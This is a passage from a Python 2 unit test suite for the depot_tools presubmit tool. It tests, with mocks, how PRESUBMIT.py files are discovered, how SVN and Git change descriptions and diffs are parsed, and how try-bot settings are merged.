'PRESUBMIT.py')).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'moo', 'mat', 'gat', 'PRESUBMIT.py')).AndReturn(False) self.mox.ReplayAll() presubmit_files = presubmit.ListRelevantPresubmitFiles(files, self.fake_root_dir) self.assertEqual(presubmit_files, [ join(self.fake_root_dir, 'PRESUBMIT.py'), join(self.fake_root_dir, 'foo', 'haspresubmit', 'PRESUBMIT.py'), join(self.fake_root_dir, 'foo', 'haspresubmit', 'yodle', 'PRESUBMIT.py') ]) def testListRelevantPresubmitFilesInheritSettings(self): join = presubmit.os.path.join sys_root_dir = self._OS_SEP root_dir = join(sys_root_dir, 'foo', 'bar') files = [ 'test.cc', join('moo', 'test2.cc'), join('zoo', 'test3.cc') ] inherit_path = presubmit.os.path.join(root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(True) presubmit.os.path.isfile(join(sys_root_dir, 'PRESUBMIT.py')).AndReturn(False) presubmit.os.path.isfile(join(sys_root_dir, 'foo', 'PRESUBMIT.py')).AndReturn(True) presubmit.os.path.isfile(join(sys_root_dir, 'foo', 'bar', 'PRESUBMIT.py')).AndReturn(False) presubmit.os.path.isfile(join(sys_root_dir, 'foo', 'bar', 'moo', 'PRESUBMIT.py')).AndReturn(True) presubmit.os.path.isfile(join(sys_root_dir, 'foo', 'bar', 'zoo', 'PRESUBMIT.py')).AndReturn(False) self.mox.ReplayAll() presubmit_files = presubmit.ListRelevantPresubmitFiles(files, root_dir) self.assertEqual(presubmit_files, [ join(sys_root_dir, 'foo', 'PRESUBMIT.py'), join(sys_root_dir, 'foo', 'bar', 'moo', 'PRESUBMIT.py') ]) def testTagLineRe(self): self.mox.ReplayAll() m = presubmit.Change.TAG_LINE_RE.match(' BUG =1223, 1445 \t') self.failUnless(m) self.failUnlessEqual(m.group('key'), 'BUG') self.failUnlessEqual(m.group('value'), '1223, 1445') def testGclChange(self): description_lines = ('Hello there', 'this is a change', 'BUG=123', ' STORY =http://foo/ \t', 'and some more regular text \t') files = [ ['A', 'foo/blat.cc'], ['M', 'binary.dll'], # a binary file ['A', 'isdir'], # a directory ['?', 'flop/notfound.txt'], # not found in 
SVN, still exists locally ['D', 'boo/flap.h'], ] blat = presubmit.os.path.join('foo', 'blat.cc') notfound = presubmit.os.path.join('flop', 'notfound.txt') flap = presubmit.os.path.join('boo', 'flap.h') binary = 'binary.dll' isdir = 'isdir' f_blat = presubmit.os.path.join(self.fake_root_dir, blat) f_notfound = presubmit.os.path.join(self.fake_root_dir, notfound) f_flap = presubmit.os.path.join(self.fake_root_dir, flap) f_binary = presubmit.os.path.join(self.fake_root_dir, binary) f_isdir = presubmit.os.path.join(self.fake_root_dir, isdir) presubmit.os.path.exists(f_blat).AndReturn(True) presubmit.os.path.isdir(f_blat).AndReturn(False) presubmit.os.path.exists(f_binary).AndReturn(True) presubmit.os.path.isdir(f_binary).AndReturn(False) presubmit.os.path.exists(f_isdir).AndReturn(True) presubmit.os.path.isdir(f_isdir).AndReturn(True) presubmit.os.path.exists(f_notfound).AndReturn(True) presubmit.os.path.isdir(f_notfound).AndReturn(False) presubmit.os.path.exists(f_flap).AndReturn(False) presubmit.scm.SVN._CaptureInfo([flap], self.fake_root_dir ).AndReturn({'Node Kind': 'file'}) presubmit.scm.SVN.GetFileProperty( blat, 'svn:mime-type', self.fake_root_dir).AndReturn(None) presubmit.scm.SVN.GetFileProperty( binary, 'svn:mime-type', self.fake_root_dir ).AndReturn('application/octet-stream') presubmit.scm.SVN.GetFileProperty( notfound, 'svn:mime-type', self.fake_root_dir).AndReturn('') presubmit.scm.SVN._CaptureInfo([blat], self.fake_root_dir).AndReturn( {'URL': 'svn:/foo/foo/blat.cc'}) presubmit.scm.SVN._CaptureInfo([binary], self.fake_root_dir).AndReturn( {'URL': 'svn:/foo/binary.dll'}) presubmit.scm.SVN._CaptureInfo([notfound], self.fake_root_dir).AndReturn({}) presubmit.scm.SVN._CaptureInfo([flap], self.fake_root_dir).AndReturn( {'URL': 'svn:/foo/boo/flap.h'}) presubmit.scm.SVN.GenerateDiff([blat], self.fake_root_dir, False, None ).AndReturn(self.presubmit_diffs) presubmit.scm.SVN.GenerateDiff([notfound], self.fake_root_dir, False, None ).AndReturn(self.presubmit_diffs) self.mox.ReplayAll() change = presubmit.SvnChange( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) self.failUnless(change.Name() == 'mychange') self.failUnless(change.DescriptionText() == 'Hello there\nthis is a change\nand some more regular text') self.failUnless(change.FullDescriptionText() == '\n'.join(description_lines)) self.failUnless(change.BUG == '123') self.failUnless(change.STORY == 'http://foo/') self.failUnless(change.BLEH == None) self.failUnless(len(change.AffectedFiles()) == 4) self.failUnless(len(change.AffectedFiles(include_dirs=True)) == 5) self.failUnless(len(change.AffectedFiles(include_deletes=False)) == 3) self.failUnless(len(change.AffectedFiles(include_dirs=True, include_deletes=False)) == 4) affected_text_files = change.AffectedTextFiles() self.failUnless(len(affected_text_files) == 2) self.failIf(filter(lambda x: x.LocalPath() == 'binary.dll', affected_text_files)) local_paths = change.LocalPaths() expected_paths = [presubmit.normpath(f[1]) for f in files] self.failUnless( len(filter(lambda x: x in expected_paths, local_paths)) == 4) server_paths = change.ServerPaths() expected_paths = ['svn:/foo/%s' % f[1] for f in files if f[1] != 'flop/notfound.txt'] expected_paths.append('') # one unknown file self.assertEqual( len(filter(lambda x: x in expected_paths, server_paths)), 4) files = [[x[0], presubmit.normpath(x[1])] for x in files] rhs_lines = [] for line in change.RightHandSideLines(): rhs_lines.append(line) self.assertEquals(rhs_lines[0][0].LocalPath(), files[0][1]) 
self.assertEquals(rhs_lines[0][1], 10) self.assertEquals(rhs_lines[0][2],'this is line number 10') self.assertEquals(rhs_lines[3][0].LocalPath(), files[0][1]) self.assertEquals(rhs_lines[3][1], 32) self.assertEquals(rhs_lines[3][2], 'this is line number 32.1') self.assertEquals(rhs_lines[8][0].LocalPath(), files[3][1]) self.assertEquals(rhs_lines[8][1], 23) self.assertEquals(rhs_lines[8][2], 'this is line number 23.1') self.assertEquals(rhs_lines[12][0].LocalPath(), files[3][1]) self.assertEquals(rhs_lines[12][1], 46) self.assertEquals(rhs_lines[12][2], '') self.assertEquals(rhs_lines[13][0].LocalPath(), files[3][1]) self.assertEquals(rhs_lines[13][1], 49) self.assertEquals(rhs_lines[13][2], 'this is line number 48.1') def testGitChange(self): description_lines = ('Hello there', 'this is a change', 'BUG=123', ' STORY =http://foo/ \t', 'and some more regular text \t') unified_diff = [ 'diff --git binary_a.png binary_a.png', 'new file mode 100644', 'index 0000000..6fbdd6d', 'Binary files /dev/null and binary_a.png differ', 'diff --git binary_d.png binary_d.png', 'deleted file mode 100644', 'index 6fbdd6d..0000000', 'Binary files binary_d.png and /dev/null differ', 'diff --git binary_md.png binary_md.png', 'index 6fbdd6..be3d5d8 100644', 'GIT binary patch', 'delta 109', 'zcmeyihjs5>)(Opwi4&WXB~yyi6N|G`(i5|?i<2_a@)OH5N{Um`D-<SM@g!_^W9;SR', 'zO9b*W5{pxTM0slZ=F42indK9U^MTyVQlJ2s%1BMmEKMv1Q^gtS&9nHn&*Ede;|~CU', 'CMJxLN', '', 'delta 34', 'scmV+-0Nww+y#@BX1(1W0gkzIp3}CZh0gVZ>`wGVcgW(Rh;SK@ZPa9GXlK=n!', '', 'diff --git binary_m.png binary_m.png', 'index 6fbdd6d..be3d5d8 100644', 'Binary files binary_m.png and binary_m.png differ', 'diff --git boo/blat.cc boo/blat.cc', 'new file mode 100644', 'index 0000000..37d18ad', '--- boo/blat.cc', '+++ boo/blat.cc', '@@ -0,0 +1,5 @@', '+This is some text', '+which lacks a copyright warning', '+but it is nonetheless interesting', '+and worthy of your attention.', '+Its freshness factor is through the roof.', 'diff --git floo/delburt.cc floo/delburt.cc', 'deleted file mode 100644', 'index e06377a..0000000', '--- floo/delburt.cc', '+++ /dev/null', '@@ -1,14 +0,0 @@', '-This text used to be here', '-but someone, probably you,', '-having consumed the text', '- (absorbed its meaning)', '-decided that it should be made to not exist', '-that others would not read it.', '- (What happened here?', '-was the author incompetent?', '-or is the world today so different from the world', '- the author foresaw', '-and past imaginination', '- amounts to rubble, insignificant,', '-something to be tripped over', '-and frustrated by)', 'diff --git foo/TestExpectations foo/TestExpectations', 'index c6e12ab..d1c5f23 100644', '--- foo/TestExpectations', '+++ foo/TestExpectations', '@@ -1,12 +1,24 @@', '-Stranger, behold:', '+Strange to behold:', ' This is a text', ' Its contents existed before.', '', '-It is written:', '+Weasel words suggest:', ' its contents shall exist after', ' and its contents', ' with the progress of time', ' will evolve,', '- snaillike,', '+ erratically,', ' into still different texts', '-from this.', '\ No newline at end of file', '+from this.', '+', '+For the most part,', '+I really think unified diffs', '+are elegant: the way you can type', '+diff --git inside/a/text inside/a/text', '+or something silly like', '+@@ -278,6 +278,10 @@', '+and have this not be interpreted', '+as the start of a new file', '+or anything messed up like that,', '+because you parsed the header', '+correctly.', '\ No newline at end of file', ''] files = [('A ', 'binary_a.png'), ('D ', 
'binary_d.png'), ('M ', 'binary_m.png'), ('M ', 'binary_md.png'), # Binary w/ diff ('A ', 'boo/blat.cc'), ('D ', 'floo/delburt.cc'), ('M ', 'foo/TestExpectations')] for op, path in files: full_path = presubmit.os.path.join(self.fake_root_dir, *path.split('/')) if op.startswith('D'): os.path.exists(full_path).AndReturn(False) else: os.path.exists(full_path).AndReturn(False) os.path.isfile(full_path).AndReturn(True) presubmit.scm.GIT.GenerateDiff( self.fake_root_dir, files=[], full_move=True, branch=None ).AndReturn('\n'.join(unified_diff)) self.mox.ReplayAll() change = presubmit.GitChange( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None, upstream=None) self.failUnless(change.Name() == 'mychange') self.failUnless(change.DescriptionText() == 'Hello there\nthis is a change\nand some more regular text') self.failUnless(change.FullDescriptionText() == '\n'.join(description_lines)) self.failUnless(change.BUG == '123') self.failUnless(change.STORY == 'http://foo/') self.failUnless(change.BLEH == None) self.failUnless(len(change.AffectedFiles()) == 7) self.failUnless(len(change.AffectedFiles(include_dirs=True)) == 7) self.failUnless(len(change.AffectedFiles(include_deletes=False)) == 5) self.failUnless(len(change.AffectedFiles(include_dirs=True, include_deletes=False)) == 5) # Note that on git, there's no distinction between binary files and text # files; everything that's not a delete is a text file. affected_text_files = change.AffectedTextFiles() self.failUnless(len(affected_text_files) == 5) local_paths = change.LocalPaths() expected_paths = [os.path.normpath(f) for op, f in files] self.assertEqual(local_paths, expected_paths) try: _ = change.ServerPaths() self.fail("ServerPaths implemented.") except NotImplementedError: pass actual_rhs_lines = [] for f, linenum, line in change.RightHandSideLines(): actual_rhs_lines.append((f.LocalPath(), linenum, line)) f_blat = os.path.normpath('boo/blat.cc') f_test_expectations = os.path.normpath('foo/TestExpectations') expected_rhs_lines = [ (f_blat, 1, 'This is some text'), (f_blat, 2, 'which lacks a copyright warning'), (f_blat, 3, 'but it is nonetheless interesting'), (f_blat, 4, 'and worthy of your attention.'), (f_blat, 5, 'Its freshness factor is through the roof.'), (f_test_expectations, 1, 'Strange to behold:'), (f_test_expectations, 5, 'Weasel words suggest:'), (f_test_expectations, 10, ' erratically,'), (f_test_expectations, 13, 'from this.'), (f_test_expectations, 14, ''), (f_test_expectations, 15, 'For the most part,'), (f_test_expectations, 16, 'I really think unified diffs'), (f_test_expectations, 17, 'are elegant: the way you can type'), (f_test_expectations, 18, 'diff --git inside/a/text inside/a/text'), (f_test_expectations, 19, 'or something silly like'), (f_test_expectations, 20, '@@ -278,6 +278,10 @@'), (f_test_expectations, 21, 'and have this not be interpreted'), (f_test_expectations, 22, 'as the start of a new file'), (f_test_expectations, 23, 'or anything messed up like that,'), (f_test_expectations, 24, 'because you parsed the header'), (f_test_expectations, 25, 'correctly.')] self.assertEquals(expected_rhs_lines, actual_rhs_lines) def testInvalidChange(self): try: presubmit.SvnChange( 'mychange', 'description', self.fake_root_dir, ['foo/blat.cc', 'bar'], 0, 0, None) self.fail() except AssertionError: pass def testExecPresubmitScript(self): description_lines = ('Hello there', 'this is a change', 'STORY=http://tracker/123') files = [ ['A', 'foo\\blat.cc'], ] fake_presubmit = 
presubmit.os.path.join(self.fake_root_dir, 'PRESUBMIT.py') self.mox.ReplayAll() change = presubmit.Change( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) executer = presubmit.PresubmitExecuter(change, False, None, False) self.failIf(executer.ExecPresubmitScript('', fake_presubmit)) # No error if no on-upload entry point self.failIf(executer.ExecPresubmitScript( ('def CheckChangeOnCommit(input_api, output_api):\n' ' return (output_api.PresubmitError("!!"))\n'), fake_presubmit )) executer = presubmit.PresubmitExecuter(change, True, None, False) # No error if no on-commit entry point self.failIf(executer.ExecPresubmitScript( ('def CheckChangeOnUpload(input_api, output_api):\n' ' return (output_api.PresubmitError("!!"))\n'), fake_presubmit )) self.failIf(executer.ExecPresubmitScript( ('def CheckChangeOnUpload(input_api, output_api):\n' ' if not input_api.change.STORY:\n' ' return (output_api.PresubmitError("!!"))\n' ' else:\n' ' return ()'), fake_presubmit )) self.failUnless(executer.ExecPresubmitScript( ('def CheckChangeOnCommit(input_api, output_api):\n' ' if not input_api.change.NOSUCHKEY:\n' ' return [output_api.PresubmitError("!!")]\n' ' else:\n' ' return ()'), fake_presubmit )) self.assertRaises(presubmit.PresubmitFailure, executer.ExecPresubmitScript, 'def CheckChangeOnCommit(input_api, output_api):\n' ' return "foo"', fake_presubmit) self.assertRaises(presubmit.PresubmitFailure, executer.ExecPresubmitScript, 'def CheckChangeOnCommit(input_api, output_api):\n' ' return ["foo"]', fake_presubmit) def testDoPresubmitChecks(self): join = presubmit.os.path.join description_lines = ('Hello there', 'this is a change', 'STORY=http://tracker/123') files = [ ['A', join('haspresubmit', 'blat.cc')], ] haspresubmit_path = join(self.fake_root_dir, 'haspresubmit', 'PRESUBMIT.py') root_path = join(self.fake_root_dir, 'PRESUBMIT.py') inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(root_path).AndReturn(True) presubmit.os.path.isfile(haspresubmit_path).AndReturn(True) presubmit.gclient_utils.FileRead(root_path, 'rU').AndReturn(self.presubmit_text) presubmit.gclient_utils.FileRead(haspresubmit_path, 'rU').AndReturn(self.presubmit_text) presubmit.random.randint(0, 4).AndReturn(1) self.mox.ReplayAll() input_buf = StringIO.StringIO('y\n') change = presubmit.Change( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) output = presubmit.DoPresubmitChecks( change, False, True, None, input_buf, None, False, None) self.failIf(output.should_continue()) self.assertEqual(output.getvalue().count('!!'), 2) self.assertEqual(output.getvalue().count( 'Running presubmit upload checks ...\n'), 1) def testDoPresubmitChecksPromptsAfterWarnings(self): join = presubmit.os.path.join description_lines = ('Hello there', 'this is a change', 'NOSUCHKEY=http://tracker/123') files = [ ['A', join('haspresubmit', 'blat.cc')], ] presubmit_path = join(self.fake_root_dir, 'PRESUBMIT.py') haspresubmit_path = join(self.fake_root_dir, 'haspresubmit', 'PRESUBMIT.py') inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) for _ in range(2): presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(presubmit_path).AndReturn(True) presubmit.os.path.isfile(haspresubmit_path).AndReturn(True) presubmit.gclient_utils.FileRead(presubmit_path, 'rU' ).AndReturn(self.presubmit_text) 
presubmit.gclient_utils.FileRead(haspresubmit_path, 'rU' ).AndReturn(self.presubmit_text) presubmit.random.randint(0, 4).AndReturn(1) presubmit.random.randint(0, 4).AndReturn(1) self.mox.ReplayAll() input_buf = StringIO.StringIO('n\n') # say no to the warning change = presubmit.Change( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) output = presubmit.DoPresubmitChecks( change, False, True, None, input_buf, None, True, None) self.failIf(output.should_continue()) self.assertEqual(output.getvalue().count('??'), 2) input_buf = StringIO.StringIO('y\n') # say yes to the warning output = presubmit.DoPresubmitChecks( change, False, True, None, input_buf, None, True, None) self.failUnless(output.should_continue()) self.assertEquals(output.getvalue().count('??'), 2) self.assertEqual(output.getvalue().count( 'Running presubmit upload checks ...\n'), 1) def testDoPresubmitChecksNoWarningPromptIfErrors(self): join = presubmit.os.path.join description_lines = ('Hello there', 'this is a change', 'NOSUCHKEY=http://tracker/123', 'REALLYNOSUCHKEY=http://tracker/123') files = [ ['A', join('haspresubmit', 'blat.cc')], ] presubmit_path = join(self.fake_root_dir, 'PRESUBMIT.py') haspresubmit_path = join(self.fake_root_dir, 'haspresubmit', 'PRESUBMIT.py') inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(presubmit_path).AndReturn(True) presubmit.os.path.isfile(haspresubmit_path).AndReturn(True) presubmit.gclient_utils.FileRead(presubmit_path, 'rU' ).AndReturn(self.presubmit_text) presubmit.gclient_utils.FileRead(haspresubmit_path, 'rU').AndReturn( self.presubmit_text) presubmit.random.randint(0, 4).AndReturn(1) self.mox.ReplayAll() change = presubmit.Change( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) output = presubmit.DoPresubmitChecks(change, False, True, None, None, None, False, None) self.assertEqual(output.getvalue().count('??'), 2) self.assertEqual(output.getvalue().count('XX!!XX'), 2) self.assertEqual(output.getvalue().count('(y/N)'), 0) self.assertEqual(output.getvalue().count( 'Running presubmit upload checks ...\n'), 1) def testDoDefaultPresubmitChecksAndFeedback(self): join = presubmit.os.path.join description_lines = ('Hello there', 'this is a change', 'STORY=http://tracker/123') files = [ ['A', join('haspresubmit', 'blat.cc')], ] DEFAULT_SCRIPT = """ def CheckChangeOnUpload(input_api, output_api): return [output_api.PresubmitError("!!")] def CheckChangeOnCommit(input_api, output_api): raise Exception("Test error") """ inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'PRESUBMIT.py') ).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'haspresubmit', 'PRESUBMIT.py')).AndReturn(False) presubmit.random.randint(0, 4).AndReturn(0) self.mox.ReplayAll() input_buf = StringIO.StringIO('y\n') # Always fail. change = presubmit.Change( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) output = presubmit.DoPresubmitChecks( change, False, True, None, input_buf, DEFAULT_SCRIPT, False, None) self.failIf(output.should_continue()) text = ( 'Running presubmit upload checks ...\n' 'Warning, no PRESUBMIT.py found.\n' 'Running default presubmit script.\n' '\n' '** Presubmit ERRORS **\n!!\n\n' 'Was the presubmit check useful? 
If not, run "git cl presubmit -v"\n' 'to figure out which PRESUBMIT.py was run, then run git blame\n' 'on the file to figure out who to ask for help.\n') self.assertEquals(output.getvalue(), text) def testDirectoryHandling(self): files = [ ['A', 'isdir'], ['A', presubmit.os.path.join('isdir', 'blat.cc')], ] isdir = presubmit.os.path.join(self.fake_root_dir, 'isdir') blat = presubmit.os.path.join(isdir, 'blat.cc') presubmit.os.path.exists(isdir).AndReturn(True) presubmit.os.path.isdir(isdir).AndReturn(True) presubmit.os.path.exists(blat).AndReturn(True) presubmit.os.path.isdir(blat).AndReturn(False) self.mox.ReplayAll() change = presubmit.Change( 'mychange', 'foo', self.fake_root_dir, files, 0, 0, None) affected_files = change.AffectedFiles(include_dirs=False) self.failUnless(len(affected_files) == 1) self.failUnless(affected_files[0].LocalPath().endswith('blat.cc')) affected_files_and_dirs = change.AffectedFiles(include_dirs=True) self.failUnless(len(affected_files_and_dirs) == 2) def testTags(self): DEFAULT_SCRIPT = """ def CheckChangeOnUpload(input_api, output_api): if input_api.change.tags['BUG'] != 'boo': return [output_api.PresubmitError('Tag parsing failed. 1')] if input_api.change.tags['STORY'] != 'http://tracker.com/42': return [output_api.PresubmitError('Tag parsing failed. 2')] if input_api.change.BUG != 'boo': return [output_api.PresubmitError('Tag parsing failed. 6')] if input_api.change.STORY != 'http://tracker.com/42': return [output_api.PresubmitError('Tag parsing failed. 7')] try: y = False x = input_api.change.invalid except AttributeError: y = True if not y: return [output_api.PresubmitError('Tag parsing failed. 8')] if 'TEST' in input_api.change.tags: return [output_api.PresubmitError('Tag parsing failed. 3')] if input_api.change.DescriptionText() != 'Blah Blah': return [output_api.PresubmitError('Tag parsing failed. 4 ' + input_api.change.DescriptionText())] if (input_api.change.FullDescriptionText() != 'Blah Blah\\n\\nSTORY=http://tracker.com/42\\nBUG=boo\\n'): return [output_api.PresubmitError('Tag parsing failed. 
5 ' + input_api.change.FullDescriptionText())] return [output_api.PresubmitNotifyResult(input_api.change.tags['STORY'])] def CheckChangeOnCommit(input_api, output_api): raise Exception("Test error") """ presubmit.random.randint(0, 4).AndReturn(1) inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) self.mox.ReplayAll() output = StringIO.StringIO() input_buf = StringIO.StringIO('y\n') change = presubmit.Change( 'foo', 'Blah Blah\n\nSTORY=http://tracker.com/42\nBUG=boo\n', self.fake_root_dir, None, 0, 0, None) self.failUnless(presubmit.DoPresubmitChecks( change, False, True, output, input_buf, DEFAULT_SCRIPT, False, None)) self.assertEquals(output.getvalue(), ('Running presubmit upload checks ...\n' 'Warning, no PRESUBMIT.py found.\n' 'Running default presubmit script.\n' '\n' '** Presubmit Messages **\n' 'http://tracker.com/42\n' '\n' 'Presubmit checks passed.\n')) def testGetTrySlavesExecuter(self): self.mox.ReplayAll() change = presubmit.Change( 'foo', 'Blah Blah\n\nSTORY=http://tracker.com/42\nBUG=boo\n', self.fake_root_dir, None, 0, 0, None) executer = presubmit.GetTrySlavesExecuter() self.assertEqual([], executer.ExecPresubmitScript('', '', '', change)) self.assertEqual([], executer.ExecPresubmitScript('def foo():\n return\n', '', '', change)) # bad results starts_with_space_result = [' starts_with_space'] not_list_result1 = "'foo'" not_list_result2 = "('a', 'tuple')" mixed_old_and_new = ['bot', ('bot2', set(['test']))] not_set = [('bot2', ['test'])] for result in ( starts_with_space_result, not_list_result1, not_list_result2, mixed_old_and_new, not_set): self.assertRaises(presubmit.PresubmitFailure, executer.ExecPresubmitScript, self.presubmit_tryslave % result, '', '', change) # good results expected_result = ['1', '2', '3'] empty_result = [] space_in_name_result = ['foo bar', '1\t2 3'] new_style = [('bot', set(['cool', 'tests']))] for result in ( expected_result, empty_result, space_in_name_result, new_style): self.assertEqual( result, executer.ExecPresubmitScript( self.presubmit_tryslave % result, '', '', change)) def testGetTrySlavesExecuterWithProject(self): self.mox.ReplayAll() change = presubmit.Change( 'foo', 'Blah Blah\n\nSTORY=http://tracker.com/42\nBUG=boo\n', self.fake_root_dir, None, 0, 0, None) executer = presubmit.GetTrySlavesExecuter() expected_result1 = ['1', '2'] expected_result2 = ['a', 'b', 'c'] script = self.presubmit_tryslave_project % ( repr('foo'), repr(expected_result1), repr(expected_result2)) self.assertEqual( expected_result1, executer.ExecPresubmitScript(script, '', 'foo', change)) self.assertEqual( expected_result2, executer.ExecPresubmitScript(script, '', 'bar', change)) def testDoGetTrySlaves(self): join = presubmit.os.path.join filename = 'foo.cc' filename_linux = join('linux_only', 'penguin.cc') root_presubmit = join(self.fake_root_dir, 'PRESUBMIT.py') linux_presubmit = join(self.fake_root_dir, 'linux_only', 'PRESUBMIT.py') inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(root_presubmit).AndReturn(True) presubmit.gclient_utils.FileRead(root_presubmit, 'rU').AndReturn( self.presubmit_tryslave % '["win"]') presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(root_presubmit).AndReturn(True) presubmit.os.path.isfile(linux_presubmit).AndReturn(True) presubmit.gclient_utils.FileRead(root_presubmit, 'rU').AndReturn( 
self.presubmit_tryslave % '["win"]') presubmit.gclient_utils.FileRead(linux_presubmit, 'rU').AndReturn( self.presubmit_tryslave % '["linux"]') self.mox.ReplayAll() change = presubmit.Change( 'mychange', '', self.fake_root_dir, [], 0, 0, None) output = StringIO.StringIO() self.assertEqual(['win'], presubmit.DoGetTrySlaves(change, [filename], self.fake_root_dir, None, None, False, output)) output = StringIO.StringIO() self.assertEqual(['win', 'linux'], presubmit.DoGetTrySlaves(change, [filename, filename_linux], self.fake_root_dir, None, None, False, output)) def testGetTrySlavesExecuter_ok(self): script_text = ( 'def GetPreferredTrySlaves():\n' ' return ["foo", "bar"]\n') results = presubmit.GetTrySlavesExecuter.ExecPresubmitScript( script_text, 'path', 'project', None) self.assertEquals(['foo', 'bar'], results) def testGetTrySlavesExecuter_comma(self): script_text = ( 'def GetPreferredTrySlaves():\n' ' return ["foo,bar"]\n') try: presubmit.GetTrySlavesExecuter.ExecPresubmitScript( script_text, 'path', 'project', None) self.fail() except presubmit.PresubmitFailure: pass def testGetTryMastersExecuter(self): self.mox.ReplayAll() change = presubmit.Change( 'foo', 'Blah Blah\n\nSTORY=http://tracker.com/42\nBUG=boo\n', self.fake_root_dir, None, 0, 0, None) executer = presubmit.GetTryMastersExecuter() self.assertEqual({}, executer.ExecPresubmitScript('', '', '', change)) self.assertEqual({}, executer.ExecPresubmitScript('def foo():\n return\n', '', '', change)) expected_result = {'m1': {'s1': set(['t1', 't2'])}, 'm2': {'s1': set(['defaulttests']), 's2': set(['defaulttests'])}} empty_result1 = {} empty_result2 = {'m': {}} space_in_name_result = {'m r': {'s\tv': set(['t1'])}} for result in ( expected_result, empty_result1, empty_result2, space_in_name_result): self.assertEqual( result, executer.ExecPresubmitScript( self.presubmit_trymaster % result, '', '', change)) def testMergeMasters(self): merge = presubmit._MergeMasters self.assertEqual({}, merge({}, {})) self.assertEqual({'m1': {}}, merge({}, {'m1': {}})) self.assertEqual({'m1': {}}, merge({'m1': {}}, {})) parts = [ {'try1.cr': {'win': set(['defaulttests'])}}, {'try1.cr': {'linux1': set(['test1'])}, 'try2.cr': {'linux2': set(['defaulttests'])}}, {'try1.cr': {'mac1': set(['defaulttests']), 'mac2': set(['test1', 'test2']), 'linux1': set(['defaulttests'])}}, ] expected = { 'try1.cr': {'win': set(['defaulttests']), 'linux1': set(['defaulttests', 'test1']), 'mac1': set(['defaulttests']), 'mac2': set(['test1', 'test2'])}, 'try2.cr': {'linux2': set(['defaulttests'])}, } for permutation in itertools.permutations(parts): self.assertEqual(expected, reduce(merge, permutation, {})) def testDoGetTryMasters(self): root_text = (self.presubmit_trymaster % '{"t1.cr": {"win": set(["defaulttests"])}}') linux_text = (self.presubmit_trymaster % ('{"t1.cr": {"linux1": set(["t1"])},' ' "t2.cr": {"linux2": set(["defaulttests"])}}')) join = presubmit.os.path.join isfile = presubmit.os.path.isfile FileRead = presubmit.gclient_utils.FileRead filename = 'foo.cc' filename_linux = join('linux_only', 'penguin.cc') root_presubmit = join(self.fake_root_dir, 'PRESUBMIT.py') linux_presubmit = join(self.fake_root_dir, 'linux_only', 'PRESUBMIT.py') inherit_path = join(self.fake_root_dir, self._INHERIT_SETTINGS) isfile(inherit_path).AndReturn(False) isfile(root_presubmit).AndReturn(True) FileRead(root_presubmit, 'rU').AndReturn(root_text) isfile(inherit_path).AndReturn(False) isfile(root_presubmit).AndReturn(True) isfile(linux_presubmit).AndReturn(True) FileRead(root_presubmit, 
'rU').AndReturn(root_text) FileRead(linux_presubmit, 'rU').AndReturn(linux_text) self.mox.ReplayAll() change = presubmit.Change( 'mychange', '', self.fake_root_dir, [], 0, 0, None) output = StringIO.StringIO() self.assertEqual({'t1.cr': {'win': ['defaulttests']}}, presubmit.DoGetTryMasters(change, [filename], self.fake_root_dir, None, None, False, output)) output = StringIO.StringIO() expected = { 't1.cr': {'win': ['defaulttests'], 'linux1': ['t1']}, 't2.cr': {'linux2': ['defaulttests']}, } self.assertEqual(expected, presubmit.DoGetTryMasters(change, [filename, filename_linux], self.fake_root_dir, None, None, False, output)) def testMainUnversioned(self): # OptParser calls presubmit.os.path.exists and is a pain when mocked. self.UnMock(presubmit.os.path, 'exists') self.mox.StubOutWithMock(presubmit, 'DoPresubmitChecks') self.mox.StubOutWithMock(presubmit, 'ParseFiles') presubmit.scm.determine_scm(self.fake_root_dir).AndReturn(None) presubmit.ParseFiles(['random_file.txt'], None ).AndReturn([('M', 'random_file.txt')]) output = self.mox.CreateMock(presubmit.PresubmitOutput) output.should_continue().AndReturn(False) presubmit.DoPresubmitChecks(mox.IgnoreArg(), False, False, mox.IgnoreArg(), mox.IgnoreArg(), None, False, None).AndReturn(output) self.mox.ReplayAll() self.assertEquals( True, presubmit.main(['--root', self.fake_root_dir, 'random_file.txt'])) def testMainUnversionedFail(self): # OptParser calls presubmit.os.path.exists and is a pain when mocked. self.UnMock(presubmit.os.path, 'exists') self.mox.StubOutWithMock(presubmit, 'DoPresubmitChecks') self.mox.StubOutWithMock(presubmit, 'ParseFiles') presubmit.scm.determine_scm(self.fake_root_dir).AndReturn(None) self.mox.StubOutWithMock(presubmit.sys, 'stderr') presubmit.sys.stderr.write( 'Usage: presubmit_unittest.py [options] <files...>\n') presubmit.sys.stderr.write('\n') presubmit.sys.stderr.write( 'presubmit_unittest.py: error: For unversioned directory, <files> is ' 'not optional.\n') self.mox.ReplayAll() try: presubmit.main(['--root', self.fake_root_dir]) self.fail() except SystemExit, e: self.assertEquals(2, e.code) class InputApiUnittest(PresubmitTestsBase): """Tests presubmit.InputApi.""" def 